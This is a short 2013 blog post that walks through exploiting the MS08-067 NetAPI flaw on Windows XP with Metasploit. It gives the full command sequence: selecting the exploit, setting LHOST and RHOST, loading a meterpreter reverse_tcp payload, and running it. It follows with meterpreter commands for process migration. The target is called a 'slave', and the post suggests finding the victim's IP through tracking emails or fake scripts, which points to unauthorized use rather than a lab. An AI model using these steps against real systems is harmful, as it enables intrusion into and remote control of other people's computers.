Wednesday, October 30, 2013

What You Need To Do..
1.Backtrack
2.slave's Ip Address.
3.Payload
4.Exploit


So Let's Start With Metasploit....
Steps To Be Followed.
Step-1:-Start The Backtrack And Open the Metasploit.We Are using Simple exploit that ms08_067_netapi.That is vulnerability in Windows XP[/b]
Description:-
This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.

Commands-"msf:>use exploit/windows/smb/ms08_067_netapi
Step-2:-You Want to set your LHOST means where you want to your reverse connection That is localhost.msf:>set LHOST eg.192.168.1.1
Step-3:- Here You want Set RHOST Ip address to Get remote's ip address use your mind how to get it.eg.Tracing,Fake script or tracking email got it
msf:>set RHOST eg.192.168.1.100
Step-4:-After All this You want to Set Payload.Payload is the piece of software that lets you control a computer system after it’s been exploited
msf:>set PAYLOAD windows/meterpreter/reverse_tcp
[Image: XP1.png]
Now everything is Done now Just do one thing with one Command that is called.
msf:>exploit
[Image: XP2.png]
After getting meterpreter use some commands to get a system.
eg. meterpreter:>getpid (to get process id)
(to migrate process) Meterpreter:>migrate process id
And anything Like this If You want All commands do one thing
Meterpreter:>? (question mark)
Categories:

0 comments:

Post a Comment

Subscribe to RSS Feed Follow me on Twitter!